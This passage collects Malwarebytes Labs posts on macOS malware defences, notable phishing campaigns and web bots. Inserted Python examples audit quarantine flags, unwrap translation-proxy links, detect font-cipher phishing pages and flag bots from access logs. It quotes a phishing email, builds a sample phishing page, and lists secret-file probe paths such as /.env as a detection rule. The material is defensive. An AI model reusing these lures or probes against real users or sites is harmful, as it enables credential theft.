Everyone deserves to experience a safe Internet, but unfortunately, this is not always easy to accomplish. Peoples’ skill-sets and levels of experience differ, as does their tolerance for bad news—or any news at all! What comes naturally to some can be downright overwhelming for others. While you might wish that Uncle Bob could have his computer license revoked, it’s better to sit him down and show him basic survival skills—all the better to not only protect himself, but others from dangers lurking on the web.

And if you go that one step further and help those less tech-savvy folks in your life by setting up some automated support in the background, you’ll save them time and money having to run repairs or clean up an infected machine.

We always sign off by telling our readers to stay safe. This time, stay safe…and help your friends do the same.

The post The lazy person’s guide to cybersecurity: minimum effort for maximum protection appeared first on Malwarebytes Labs.


How does macOS protect against malware?

Malwarebytes - Thu, 02/21/2019 - 16:00

Mac users often are told that “Macs don’t get viruses.” This is not really true, of course. Macs can and do get infected. However, it is true that macOS provides some basic protection against malware. This protection can be quite effective in some ways, but, unfortunately, quite ineffective in others. Let’s take a look at how macOS features protect you from malware, and how malware can get past these features.

Quarantine

macOS has a feature that is called Quarantine. Any time a file is downloaded from the Internet, it gets marked with a Quarantine “flag.” When you try to open a downloaded app with this flag set, macOS will kick off a whole bunch of checks.

If all of those checks are successful, macOS will display a message alerting you that you’re opening an application downloaded from the Internet, which you’ll have to allow if you want to use the file. (macOS flashes this message to users to display the true nature of the file, in case it was disguised as another type, for example, an app disguised as a document.)

Once the app has been opened successfully for the first time, the Quarantine flag is removed, and these checks won’t be repeated again.

Some of the other protection features in macOS depend on Quarantine, and unfortunately, there are some ways that apps can get onto your hard drive without being marked with a Quarantine flag. Some examples:

  • Not all apps will properly set a Quarantine flag on files they download; torrent apps and malicious downloaders are two good examples.
  • Copying an app to another Mac after the Quarantine flag has been removed will result in the app not being quarantined on the second Mac.
  • Copying a file to a non-Mac file share or a USB flash drive that is not Mac formatted will result in the Quarantine flag being lost.
  • Vulnerabilities that enable creation of files without going through legitimate download methods allow for flagless apps on the hard drive.

Gatekeeper

Rewind back to when an app is downloaded from the Internet, and a Quarantine flag has been planted. The first of the checks conducted on a quarantined app is a check of the app’s code signature.

A code signature is a bit of cryptographic data that identifies the creator of the app and can be used to determine whether the app has been tampered with. It depends on a certificate obtained from Apple, as part of a $99 developer account.

If the code signature indicates that the app has been tampered with, or that the certificate used to create the signature has been revoked by Apple, macOS won’t allow the app to run at all.

Unfortunately, Gatekeeper is not infallible, and its biggest weakness is Quarantine itself. Gatekeeper checks do not happen for apps that are not quarantined, which includes apps that were quarantined, but have already been opened at least once and are thus no longer quarantined.

This means that an innocent-looking app could download all kinds of malicious processes in the background once installed, and those processes would not be subject to Gatekeeper checks. Similarly, if you had run a malicious app on your computer, and some time later Apple revoked the developer certificate used for its code signature, the app would continue to run on your Mac because code signature checks only happen for quarantined apps as part of Gatekeeper.

This also means that malware could maliciously modify apps on your Mac, which would make the malware devilishly hard to find and remove.
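The Quarantine bypasses listed above and the Gatekeeper caveat that follows them come down to one question you can answer on the machine itself: does this app bundle carry the com.apple.quarantine attribute at all, and what would Gatekeeper say about it? The script below is an added example, not Apple's tooling and not code from the original article. It shells out to the macOS `xattr` and `spctl` commands where they exist and otherwise degrades to a flag-presence report; the four-field layout it parses (hex flags, hex download time, agent name, UUID) is the observed format of that attribute, and the flag bits are deliberately treated as opaque. The sample values used in the comments are constructed.

```python
"""Audit .app bundles for the com.apple.quarantine attribute that Gatekeeper
and XProtect key on, and ask Gatekeeper for its verdict where spctl exists.
Added example; assumes the macOS xattr/spctl CLIs and the observed
"flags;timestamp;agent;uuid" attribute layout."""
import os
import shutil
import subprocess
from datetime import datetime, timezone

QUARANTINE_ATTR = "com.apple.quarantine"


def parse_quarantine(value: str) -> dict:
    """Decode a quarantine value such as "0083;5c6a1b2e;Safari;<uuid>" (constructed).

    Fields are ';'-separated: hex flags, hex Unix time of the download, the
    agent that set the flag, and a UUID. Flag bits are returned raw; only the
    attribute's presence decides whether Gatekeeper/XProtect inspect the app.
    """
    fields = value.strip().split(";")
    if len(fields) < 2:
        raise ValueError(f"unexpected quarantine value: {value!r}")
    return {
        "flags": int(fields[0], 16),
        "downloaded_at": datetime.fromtimestamp(int(fields[1], 16), tz=timezone.utc),
        "agent": fields[2] if len(fields) > 2 else "",
        "uuid": fields[3] if len(fields) > 3 else "",
    }


def read_quarantine(path: str):
    """Raw attribute via `xattr -p` (macOS); None when absent or xattr is missing."""
    if shutil.which("xattr") is None:
        return None
    proc = subprocess.run(["xattr", "-p", QUARANTINE_ATTR, path],
                          capture_output=True, text=True, check=False)
    value = proc.stdout.strip()
    return value if proc.returncode == 0 and value else None


def gatekeeper_verdict(path: str):
    """`spctl --assess --type execute`: exit 0 means Gatekeeper would allow it."""
    if shutil.which("spctl") is None:
        return None
    proc = subprocess.run(["spctl", "--assess", "--type", "execute", path],
                          capture_output=True, text=True, check=False)
    return "accepted" if proc.returncode == 0 else "rejected"


def find_apps(root: str = "/Applications"):
    """Top-level .app bundles under root; empty list off macOS."""
    if not os.path.isdir(root):
        return []
    return sorted(os.path.join(root, n) for n in os.listdir(root) if n.endswith(".app"))


def audit(app_paths, reader=read_quarantine, assessor=gatekeeper_verdict):
    """One row per app: quarantined or not, parsed fields, Gatekeeper verdict.

    reader/assessor are injectable so the logic can be exercised without macOS.
    """
    report = []
    for app in app_paths:
        raw = reader(app)
        row = {"app": app, "quarantined": raw is not None, "gatekeeper": assessor(app)}
        if raw is None:
            # This is the case the article warns about: no flag, no checks at launch.
            row["note"] = "no quarantine flag: Gatekeeper and XProtect will not inspect this app at launch"
        else:
            row.update(parse_quarantine(raw))
        report.append(row)
    return report


if __name__ == "__main__":
    for row in audit(find_apps()):
        print(row)
```

Run it as-is on a Mac to list which installed apps would still be checked if launched fresh and which have already shed their flag. An app that reports `quarantined: False` together with `gatekeeper: rejected` is exactly the revoked-certificate case described above: the system would refuse it if it were still quarantined, but it will run anyway.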

XProtect

A hidden feature of the system that you’d never know was there, XProtect is a basic anti-malware feature also tied to Quarantine. XProtect has a relatively small number of rules for identifying known malicious apps, and every quarantined app that you attempt to open is run past XProtect first. If it matches any of the rules, macOS will not allow you to open it.

XProtect suffers from the same problems as Gatekeeper, in that it can’t protect against anything that doesn’t have a Quarantine flag. There’s a bigger problem, however: at the time of this writing, the most recent rule added to XProtect was on March 13, 2018. So it’s missing rules for nearly an entire year of new malware! The future of XProtect is unclear, but it’s definitely not protecting you against current threats.

Malware Removal Tool

In 2012, a series of attacks on macOS through vulnerabilities in Java resulted in malware being installed simply by visiting a website. Since this bypassed Quarantine, it was not something that the security measures in macOS at that time were equipped to deal with. Thus, Apple silently created the Malware Removal Tool, or MRT.

The MRT is a black box. Nobody really knows exactly how or when it works, and it runs silently, without any notifications to the person using the computer. Its sole purpose is to remove known malware that has gotten onto the computer.

Like XProtect, MRT recognizes only known malware via what appear to be hard-coded rules inside the MRT code. Nobody really knows how those rules work, and lately Apple has taken to obfuscating the malware name strings in the MRT code, so we can’t tell what it’s capable of detecting, either.

There’s no malware called OSX.28a9883.A, but that’s what Apple’s calling it

Unfortunately, MRT has not seen many updates lately that can be identified easily. Because it’s such a black box, it’s impossible to know, but it certainly doesn’t look like it is capable of detecting much recent malware.

System Integrity Protection

Abbreviated as SIP, this feature protects the core system files from modification. Also referred to as “rootless,” SIP works by preventing all users, including the all-powerful root user, from changing a large number of restricted files on the system. Only certain pieces of Apple software can make changes to these files. This feature can only be turned off by rebooting the computer into recovery mode and entering an arcane command in the Terminal, which is not something the average person is likely to do.

Although SIP caused problems for some software at the time of its introduction, it has proven to be an excellent security measure, ensuring that the system files cannot be tampered with.

thomas$ sudo mkdir /System/blah
Password:
mkdir: /System/blah: Operation not permitted

As a result, some people believe that SIP plays a role in preventing malware from infecting Macs. Unfortunately, that’s not the case. Even before SIP, only some malware made changes to the files that are now protected by SIP. Malware can infect a Mac quite easily without doing that, and without even needing root permissions. This means SIP does nothing to prevent malware from invisibly infecting your Mac if you make the mistake of opening the wrong app.

Transparency, Consent, and Control

This mouthful is shortened simply to TCC, and it is a new feature of macOS 10.14 (Mojave). TCC protects certain user data against outside access, with the goal of preventing apps from surreptitiously doing things like slurping up your web browsing history.

This is a noble goal, but despite its short life so far, TCC has had some issues. These range in seriousness from a proliferation of permission request dialogs that can cause “dialog fatigue” to vulnerabilities that could allow apps to reach right past TCC and get access to the data anyway.

An example of a TCC dialog. Many people will just click OK to make it go away.

TCC does not prevent malware infection itself. However, it does—when working correctly—prevent malware from gaining access to some of your data. Don’t get too comfortable, though, as malware is still gobbling up unprotected data, such as passwords and credit cards stored in Chrome’s autofill, which is not covered by TCC.

My brain is exploding! What does all this mean?

The good news is that Apple is constantly working on making macOS a safer place. Although security experts are quick to point out holes in the protection features in macOS, your Mac is definitely more secure with them than without them.

However, it’s important to keep in mind that each and every one of these protections does have holes. Malware creators know exactly where those holes are, and are adept (some of them, anyway) at exploiting them. So don’t let your guard down.

In the security world, we like to talk about layers of protection. Having multiple layers is good practice, because if malware gets beyond one or two, it can still be blocked by another layer. With the various holes in current protection features, it makes sense to add another layer of protection to your Mac, such as antivirus software.

Malwarebytes for Mac, for example, can help to plug holes by detecting current threats that XProtect and MRT don’t. With the newly-introduced App Block feature, it can also help plug the holes in Gatekeeper.

So knowing what your Mac is capable of protecting against on its own and where it needs assistance can keep you more secure, whether you’re downloading apps from the Internet or simply taking an extra second to read through those dialog boxes.

The post How does macOS protect against malware? appeared first on Malwarebytes Labs.


Sophisticated phishing: a roundup of noteworthy campaigns

Malwarebytes - Wed, 02/20/2019 - 19:21

Phishing is a problem nearly as old as the Internet. Yet, criminals continue to reach into their bag of phishing tricks in 2019 because, in a nutshell, it just works. Dialing into the human psyche and capitalizing on emotions such as fear, anxiety, or plain laziness, phishing attacks are successful because they take aim at our weaknesses and exploit them—in much the same way an exploit kit takes advantage of a vulnerability in a software program.

To understand why phishing attacks continue to work, we look to cutting-edge tactics devised by threat actors to obfuscate their true intentions and capitalize on basic negligence. To that end, we’ve put together a roundup of noteworthy, out-of-the-box phishing campaigns of the last year. Here are the attacks that stood out.

You can’t easily dismiss this one

Myki, makers of the top-rated password manager with the same name, recently discovered a deceptive Facebook phishing scam that is so utterly convincing that it piqued the interest of security researchers.

The hullabaloo began when the company started receiving multiple reports from users that their Myki password manager was refusing to automatically fill a Facebook pop-up window on sites they visited, citing this as a bug.

After further investigation, Myki security researchers realized that it wasn’t a bug, and, in fact, their product was protecting their clients from trusting the purported Facebook pop-up. Below is a video demo of the phishing campaign they were able to unearth and successfully reproduce:

Video demo (Courtesy of Myki)

“[The] Hacker designs a very realistic-looking social login pop-up prompt in HTML,” wrote Antoine Vincent Jebara, Co-founder and CEO of Myki, in a blog post. “The status bar, navigation bar, shadows, and content are perfectly reproduced to look exactly like a legitimate login prompt.”

The fake pop-up looks and feels so real that users can drag and dismiss it like one could with a legitimate pop-up. But while it brings a convincing level of legitimacy to the attack, the pop-up gives the game away once users attempt to drag it out of the page, which can’t happen because the parts touching the edge of the browser window disappear, making users realize that the pop-up is part of the web page itself.

So, the next time you notice that your password manager is acting funny—like, not pre-filling on pop-up windows as you know it’s supposed to—try dragging the pop-up away from your browser. If a section (or mostly all) of it disappears after reaching the browser’s edge, it’s a fake pop-up. Close the page tab immediately!

Phishing by a thousand characters

By any sane standard, a 400- to 1,000-character long URL is overkill. Yet this didn’t stop a phisher from using it in his/her campaign. Not just once but in multiple instances in a phishing campaign email—much to the annoyance of clever recipients.

Screenshot of the kilometric long URL used in the campaign (Courtesy of MyOnlineSecurity)

The extracted URL above was taken from an email purporting to be a notification from the recipient’s email domain, telling them that their account was blacklisted due to multiple login failures. It then instructed recipients to upgrade and verify their email account before the service provider suspends or terminates the account.

No one knows for sure why someone would be crazy enough to attempt this. By now, fraudsters know there are better, more sustainable ways of obfuscating URLs. But alas, hardworking phishers are still out there. It’s not easy copying and pasting all those characters, after all, much less manually typing them out.

Let’s give them an A for effort, shall we? Nevertheless, phishing is no laughing matter, so let’s keep an eye on this one.

(Not) lost in (Google) translation

Online translation services were designed to serve one purpose: translate content from its original language to another. Who would have expected that phishers could use a legitimate Google Translate page as the landing page for users they’re attempting to own?

Screenshot of the phishing email (Courtesy of Akamai)

To: {recipient}
From: Security Accounts <facebook_secur@hotmail[.]com>
Subject: Security Alert
Message body:

Connecting to a new device


A user has just signed in to your Google Account from a new Windows device. We are sending you this email to verify that it is you.

[Consult the activity]

‘Why do this?’ you might wonder. According to Larry Cashdollar, Senior Security Response Engineer from Akamai, in a blog post, “Using Google Translate does some things; it fills the URL (address) bar with lots of random text, but the most important thing visually is that the victim sees a legitimate Google domain. In some cases, this trick will help the criminal bypass endpoint defenses.”

He also noted that this kind of tactic could be accepted by targets without suspicion when viewed on a mobile device, as the phishing email and landing page appear more legitimate. When viewed on a laptop or desktop, however, the flaws of this tactic are glaring.

Cashdollar mentioned that this phishing campaign is a two-prong attack, wherein phishers aimed at harvesting Google credentials first and then Facebook credentials next. The domain for the fake Facebook login is not hosted on a Google Translate page, mind you.

“…it’s highly uncommon to see such an attack target two brands in the same session,” Cashdollar further wrote.

For users to avoid falling for such a phish, Cashdollar has this to say: “The best defense is a good offense. That means taking your time and examining the message fully before taking any actions. Does the “from” address match what you’re expecting? Does the message create a curious sense of urgency, fear, or authority, almost demanding you do something? If so, those are the messages to be suspicious of, and the ones most likely to result in compromised accounts.”
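A link checker that looks only at the displayed domain will wave a Google Translate wrapper through. The added example below (not Akamai's code and not code from the original article) unwraps the translate.google.com proxy form, in which the real destination rides in the `u` query parameter, and treats the newer `*.translate.goog` host form as proxied without trying to reverse its hostname rewrite. Which hosts and which parameter to look for are assumptions stated in the code, and the sample URLs are constructed.

```python
"""Unwrap Google Translate proxy links before judging where a login link really goes.
Added example; the proxy hosts and the `u` parameter are assumptions."""
from urllib.parse import urlparse, parse_qs, unquote

# Hosts that serve translated copies of third-party pages, carrying the real
# target in the `u` query parameter (assumption: these two hosts, this name).
TRANSLATE_PROXY_HOSTS = {"translate.google.com", "translate.googleusercontent.com"}


def unwrap_translate_url(url: str, max_depth: int = 5):
    """Return (final_url, proxied), following nested wrapping up to max_depth."""
    proxied = False
    for _ in range(max_depth):
        parts = urlparse(url)
        host = (parts.hostname or "").lower()
        if host in TRANSLATE_PROXY_HOSTS:
            target = parse_qs(parts.query).get("u")
            if not target:
                break
            url, proxied = unquote(target[0]), True
            continue
        if host.endswith(".translate.goog"):
            # Newer proxy form rewrites the original hostname into a subdomain;
            # the rewrite is lossy, so just record that a proxy is in play.
            proxied = True
        break
    return url, proxied


def host_matches(host: str, domains) -> bool:
    """True if host is one of the expected domains or a subdomain of one."""
    host = (host or "").lower()
    return any(host == d or host.endswith("." + d) for d in domains)


def assess_link(url: str, expected_domains) -> dict:
    """Compare the host a victim sees with the host that actually serves the page."""
    final, proxied = unwrap_translate_url(url)
    shown = urlparse(url).hostname or ""
    real = urlparse(final).hostname or ""
    if proxied:
        verdict = "suspicious"        # a login page has no business being translated
    elif not host_matches(real, expected_domains):
        verdict = "unexpected-host"
    else:
        verdict = "ok"
    return {"displayed_host": shown, "effective_host": real,
            "proxied": proxied, "verdict": verdict}


if __name__ == "__main__":
    # Constructed sample in the shape the campaign used: a Google domain up front,
    # a look-alike host hidden in the query string.
    sample = ("https://translate.google.com/translate?hl=en&sl=auto&tl=en"
              "&u=http%3A%2F%2Faccounts-google.example%2Fsignin")
    print(assess_link(sample, {"google.com"}))
```

The check is deliberately blunt: any translation proxy in front of a credential page is treated as hostile, because the legitimate case (a user translating their own bank's login form) is rare enough to be worth a false positive.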

Where did the quick brown fox go?

Unfortunately, it was replaced by letters placed where they weren’t supposed to be, so that phishers could hide the source code of their landing page and make it look less suspicious.

This was what our friends at Proofpoint found when they encountered a campaign that leveraged custom font files for decoding and hiding content.

This particular phishing attack started off as an email purporting to originate from a major US bank, and when users clicked the link in the email, they were directed to a convincing replica of the bank’s official page, ready and waiting to receive credential input.

The custom font files, namely woff and woff2, installed a substitution cipher, which then replaced the letters users see on the page with other letters in the source code via direct character substitution. So, the text “The quick brown fox…” seen in the normal font file, for example, was “Eht wprcx bivqn fvk…” in the custom font file.

Screenshot of the woff font file (Courtesy of Proofpoint)

Proofpoint noted that the phishing kit may have been available since May 2018, if not earlier.
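To make the substitution concrete, here is an added example (not Proofpoint's kit and not code from the original article) that recovers the source-to-glyph map from the crib quoted above, renders what the victim would see, and scores a page with a rough heuristic: an inline, base64-embedded @font-face plus visible text that is mostly not dictionary words. The HTML page, the wordlist and the base64 placeholder are constructed for the example; the heuristic is an illustration of the idea, not a substitute for inspecting the font file's character map.

```python
"""Model the custom-font substitution trick and a heuristic to flag it.
Added example; the crib comes from the article, everything else is constructed."""
import re
from html.parser import HTMLParser

# Crib taken from the article: text as it sits in the page source versus what
# the custom font draws for it on screen.
SOURCE_CRIB = "eht wprcx bivqn fvk"
RENDERED_CRIB = "the quick brown fox"

# Constructed stand-in for a real dictionary.
WORDLIST = {"the", "quick", "brown", "fox", "enter", "your", "password",
            "sign", "in", "username", "online", "banking"}


def derive_substitution(source: str, rendered: str) -> dict:
    """Recover the source-char -> glyph map from a known plaintext pair."""
    if len(source) != len(rendered):
        raise ValueError("crib strings must align character for character")
    mapping = {}
    for s, r in zip(source, rendered):
        if mapping.setdefault(s, r) != r:
            raise ValueError(f"inconsistent mapping for {s!r}")
    return mapping


def render(source_text: str, mapping: dict) -> str:
    """What the victim sees once the page is drawn with the substituting font."""
    return "".join(mapping.get(ch, ch) for ch in source_text)


class _TextExtractor(HTMLParser):
    """Collect visible text, skipping <style> and <script> bodies."""

    def __init__(self):
        super().__init__()
        self._skip = 0
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag in ("style", "script"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("style", "script") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def visible_text(html: str) -> str:
    parser = _TextExtractor()
    parser.feed(html)
    return " ".join(parser.chunks)


# An @font-face whose source is a data: URL, i.e. a font shipped inside the page.
INLINE_FONT_RE = re.compile(r"@font-face[^}]*src\s*:\s*url\(\s*['\"]?data:", re.I | re.S)


def score_page(html: str, wordlist=WORDLIST, threshold: float = 0.5) -> dict:
    """Flag pages that embed a font and whose source text is mostly non-words."""
    words = re.findall(r"[a-z]+", visible_text(html).lower())
    ratio = sum(w in wordlist for w in words) / len(words) if words else 1.0
    inline_font = bool(INLINE_FONT_RE.search(html))
    return {"inline_font": inline_font, "dictionary_ratio": round(ratio, 2),
            "suspicious": inline_font and ratio < threshold}


# Constructed phishing page: the visible strings are ciphertext in the source
# ("tneti" renders as "enter" under the crib-derived mapping).
PHISH_HTML = """<html><head><style>
@font-face { font-family: "f"; src: url(data:font/woff2;base64,AAAA) format("woff2"); }
body { font-family: "f"; }
</style></head><body>
<p>eht wprcx bivqn fvk</p><form><label>tneti</label><input name="u"></form>
</body></html>"""


if __name__ == "__main__":
    mapping = derive_substitution(SOURCE_CRIB, RENDERED_CRIB)
    print(render(visible_text(PHISH_HTML), mapping))
    print(score_page(PHISH_HTML))
```

The dictionary-ratio test is what a scanner can do without understanding the font; the crib-based decoder is what an analyst does once one page from the kit has been matched up against its rendering, after which every other page built on the same font falls to the same map.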

To combat this tactic and the others noted in this roundup, users must continue sticking to established safe computing protocols, such as not clicking links of emails that are suspicious and visiting bank websites directly from the browser instead of via email.

Businesses can also stay on top of less obvious phishing attacks by incorporating them into employee training programs. Any good anti-phishing plan will use techniques currently being used in the wild (whereas the Nigerian Prince, while still out there, is probably not one you still need to train on.)

As always, stay safe, and stay informed!

The post Sophisticated phishing: a roundup of noteworthy campaigns appeared first on Malwarebytes Labs.


Good bots, bad bots: friend or foe?

Malwarebytes - Wed, 02/20/2019 - 16:00

One of the most talked about technologies online today is the ubiquitous bot. Simultaneously elusive yet also responsible for all of civilisation’s woes, bots are a hot topic of contention. If we went purely by news reports, we’d assume all bots everywhere are evil, and out to get us (or just spreading memes). We’d also assume every single person we ever disagreed with online is a bot. 

It might surprise you to learn that not all bots are bad. You may only hear about the negatives, but they can be a genuine form of assistance for both people at home and in the workplace.

First, let’s pin down exactly what a bot is (and isn’t).

What is a bot?

Good question.

Bots, as we understand them, perform basic or complex tasks at a speed much faster than we humans can. They’re often there to prop up the bits of a process that humans can’t get to, keeping the plates spinning on our behalf.

The ones you’ve probably heard doing good deeds are search engine web crawlers, chatbots in Skype, Slack, or various forms of instant messaging, and even front line support queries for businesses.

The rest? Those could be bad, but their mileage may vary. More areas of business depend upon bots than you may think, and they’re increasingly being used for all manner of tasks. Some benefit people at home, others simply benefit the organisation running them. However they stack up, we’re going to look at some of the more common ones and give you some things to think about. If you’re putting your own bot together, we hope this will help.

Crawlers

Crawlers do exactly what the name suggests: they crawl. They weave their merry way across the Internet, grabbing, analysing, and cataloguing unimaginable amounts of data daily. Without them going about their business, many things we take for granted simply wouldn’t function as well as they do.

For example, search engine crawlers help us to flesh out search engines. If they didn’t do their job and do it well, you might never actually find the thing you were looking for. Search engine crawler stagnation essentially equals the same for your website—stagnation, marooned on an island of “doesn’t live here.” There are some cases where website owners may not want to be crawled, and they can block bot access via the Robots Exclusion Standard.

Robots.txt is a file you can place in your website directory to ask crawlers not to fetch specific content. Essentially, Robots.txt is a polite notice turning visitors away. Want a specific example? Many people don’t want old versions of their websites recorded for all time. As a result, they may include a line in Robots.txt to keep the Internet Archive from coming to call and scraping the content.

Where this method often goes wrong is that the polite turn away is exactly that—too polite.

Rules: meant to be broken

When the bad bots show up, they’re likely to ignore the “we’re full, sorry” notice and just throw a chair through the window. In fact, some security people will suggest not bothering with a Robots.txt at all. The theory is that some rogue entities will deliberately look for it, and then immediately go poking around all the site portions the owner wanted to hide.

“Wait, which bots are the bad bots creeping around the Internet?!” I hear you cry. Well, there are a lot of them, and the poor old Robots.txt file probably won’t be much help here. One of the best ways to tell a bad bot from a good one is to examine its behavior. Bad bot behavior includes:

  • Brute force login attempts
  • Content scraping to steal or mirror content
  • Probing for hidden areas
  • Overloading the website with traffic
  • Vulnerability hunting: looking to exploit outdated apps, plugins, or content management systems

Even if you think your website is up-to-date, the server it runs on may not be, which means the bot issue is likely out of your hands. There’s a lot to contend with for a website admin.

Not all is lost, however. You can make use of a variety of scanning tools to mimic bot behaviour and see which form of bad bottery you’re most susceptible to. At that point, you can apply the correct fix as required.
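Robots.txt can only ask, so the useful signal is what a client does after reading it. The following added example (not code from the original article) parses a handful of constructed access-log lines and a constructed robots.txt with Python's urllib.robotparser, then flags clients that read robots.txt and went straight for a disallowed path, clients hammering a login endpoint, and clients asking for files nothing legitimate requests. The thresholds and the probe-path list are assumptions, and the IP addresses are documentation ranges.

```python
"""Classify clients in a web access log by behaviour, using robots.txt as a
signal of intent rather than as protection. Added example; log lines,
robots.txt, thresholds and probe paths are all constructed."""
import re
from collections import defaultdict
from urllib import robotparser

# Constructed robots.txt for the site being watched.
ROBOTS_TXT = """User-agent: *
Disallow: /admin/
Disallow: /backup/
"""

# Paths that nothing legitimate asks for on this site (constructed list).
PROBE_PATHS = ("/.env", "/phpmyadmin/", "/wp-config.php.bak", "/.git/config")

# Common log format: client, ident, user, [time], "METHOD path proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def parse_log(lines):
    """Yield one dict per parseable request; silently skip malformed lines."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            req = m.groupdict()
            req["status"] = int(req["status"])
            yield req


def load_robots(text: str) -> robotparser.RobotFileParser:
    rp = robotparser.RobotFileParser()
    rp.parse(text.splitlines())
    return rp


def classify(lines, robots_text: str = ROBOTS_TXT, login_threshold: int = 5) -> dict:
    """Map client IP -> set of behaviour flags."""
    rp = load_robots(robots_text)
    per_ip = defaultdict(list)
    for req in parse_log(lines):
        per_ip[req["ip"]].append(req)

    verdicts = {}
    for ip, reqs in per_ip.items():
        flags = set()
        paths = [r["path"].split("?")[0] for r in reqs]
        # Read the "keep out" sign, then walked through the door anyway.
        disallowed = [p for p in paths if not rp.can_fetch("*", p)]
        if "/robots.txt" in paths and disallowed:
            flags.add("robots_probe")
        # Repeated failed POSTs to anything login-shaped.
        failed_logins = sum(1 for r in reqs
                            if r["method"] == "POST"
                            and "login" in r["path"].lower()
                            and r["status"] in (401, 403))
        if failed_logins >= login_threshold:
            flags.add("brute_force")
        # Asking for secrets, backups or admin consoles by well-known name.
        if any(p in PROBE_PATHS for p in paths):
            flags.add("vuln_probe")
        verdicts[ip] = flags
    return verdicts


def _line(ip, method, path, status):
    """Build one constructed log line in common log format."""
    return (f'{ip} - - [20/Feb/2019:16:00:00 +0000] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"')


SAMPLE_LOG = [
    _line("192.0.2.9", "GET", "/robots.txt", 200),       # polite crawler
    _line("192.0.2.9", "GET", "/blog/", 200),
    _line("203.0.113.5", "GET", "/robots.txt", 200),     # reads the sign...
    _line("203.0.113.5", "GET", "/admin/", 403),         # ...then ignores it
    _line("203.0.113.5", "GET", "/backup/site.tar.gz", 404),
    _line("203.0.113.5", "GET", "/.env", 404),
] + [_line("198.51.100.7", "POST", "/wp-login.php", 401) for _ in range(6)]


if __name__ == "__main__":
    for ip, flags in classify(SAMPLE_LOG).items():
        print(ip, sorted(flags) or "clean")
```

Point it at a real log by feeding the file's lines to classify() and it produces the same per-client flags; the robots_probe rule is the one that turns the "don't publish a robots.txt" worry on its head, since a client that reads the file and immediately tries the paths it lists has identified itself.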

Good, bad, or somewhere in-between

For some people, lines may blur a little between good bots versus bad ones. The most basic of interactions can produce all manner of knock on effects. For example:

Imagine your site is attacked by a content scraper, and all your hard work ends up on a cut and paste merchant’s website. Not cool. You then sign up to a copyright detection bot service, which crawls the web in search of your pilfered text. The scammer running the site has a block in its robots.txt file explicitly requesting the copyright sniffer not to come knocking. At this point, the bot is fully justified in avoiding the polite request to go in, scan the text, then report back to base that someone’s been up to no good. Your bot is now breaking the rules, and you’re tainted with justified wrongdoing forever.

Beating the system

Additionally, search engines can be gamed. SEO poisoning, where rogue links are included in results, was a problem for a long time before major providers started clamping down (with variable success). Even so, there are variations on these attempts. And outside of those, you still have the threat of compromised sites giving bad portals a boost.

If your organisation intends to deploy a web-scraping bot of its own, you may want to keep some of these developments in mind. It’s a fine line between helpful and nuisance, and not all rival bots play nice. It only takes a few mishaps with another org’s service or website, and you’ve got a major PR issue to deal with.

Time for a chat?

Chatbots have been around for a long time. The first was ELIZA, created in 1966 by Joseph Weizenbaum. While he considered ELIZA to highlight the superficiality of human/computer interaction, he was surprised at people attributing human emotions to the dialogue. Wind forward a couple of decades, and you have Roman Mazurenko turned into a chatbot for friends and family to interact with after his tragic early death. Years later, the same questions are being asked in terms of where the line is drawn, and whether such interactions are even healthy.

Many people think of chatbots (at least the good ones) as a recent development. However, chatbots have been used for some time for nefarious purposes—the first thing that springs to mind is pornography spam bots asking for credit card details. Quite often, that association is accompanied by thoughts of malware and other shenanigans. Spreading out from forums and old-style chatrooms/IRC to instant messaging platforms and social media, bots have improved in their ability to actually help, instead of pilfering data or infecting machines.

Often sporting limited phrases and becoming the butt of endless “look at me fool this spam bot” jokes, many businesses didn’t bother to invest in bots because the technology wasn’t there. Nowadays, you’ll find decent bot assistance for everything from shopping portals and banking to utility service providers.

Healthy living

Even Microsoft are in on the action at this point, with their Microsoft Healthcare Bot. This allows providers to customise their own AI-driven bot solution and roll it out to customers and clients. Elsewhere, chat-centric health bots are clearly seen as the future of medical assistance, with everything from therapy to simple daily reminders to take your pills. This view may be a little optimistic, as the potential for incorrect diagnosis or faulty advice is there. Integration with household IoT devices known to occasionally glitch out could increase that possibility. However, this is a clear use-case for mostly maligned bot technology as a force for good.

Fun for all the family?

Chatbots for children/teens are also a big thing now. Many of them are integrated with Facebook messenger, and will allow them to talk some Hearthstone, Marvel, or (for the older bot fans) converse with an AI replica of a dead horror movie character.

Ad fraud

Ad fraud is something that seems to have been around as long as ads themselves. Bots automate the process of clicking ads to provide a bump in income for the person who placed the ad. The more clicks, the more revenue generated. This is most commonly accomplished by infecting as many PCs as possible, then using those PCs to click ads.

There have been many ad fraud trends over the years. One of the biggest I can remember is the rush to profit from high pay-outs on the word “Mesothelioma,” a rare form of cancer related to asbestos. For this, websites hijacked IE users, infected their PCs, and used instant messaging to send bad links while opening the ads in the unaware user’s browser.

Quite sophisticated, and apart from scale and profit, nothing much has changed. Ad fraud is entirely harmful, and often goes hand-in-hand with malvertising and ransomware attacks. These bots were designed to do bad, and they are accomplishing what they were meant to do.

Snipers in commerce land

Let the bidding wars begin! Automated commerce tools are pretty cut and dried. Not everyone wants their web pages crawled, but you aren’t really going to lose out to someone in direct competition. Company X may use chatbots and your business doesn’t, but some customers will prefer the human touch and vice-versa. It isn’t going to make or break anything, particularly.

Where sales are concerned though, it’s pretty black and white. Where cash is involved, anything can happen and usually does. It’s a long time since scammers used bots to “buy” from other bots and bump up fake reputations, and that was quickly replaced in popularity by sniper tools.

Sniping tools have been around for a long time, and are somewhat controversial in seller circles. The basic idea is to give the sniper tool access to your eBay account (or any other bidding service), and at the very last moment before a sale ends, it’ll throw in your bid. Rivals are unable to counter because there’s nothing they can do about an automated service working to nanoseconds instead of a human hammering at a keyboard. So is this bad? For the other users, yes. For eBay as a platform, absolutely. Overall? Remains to be seen.

Fending off the bad bidders

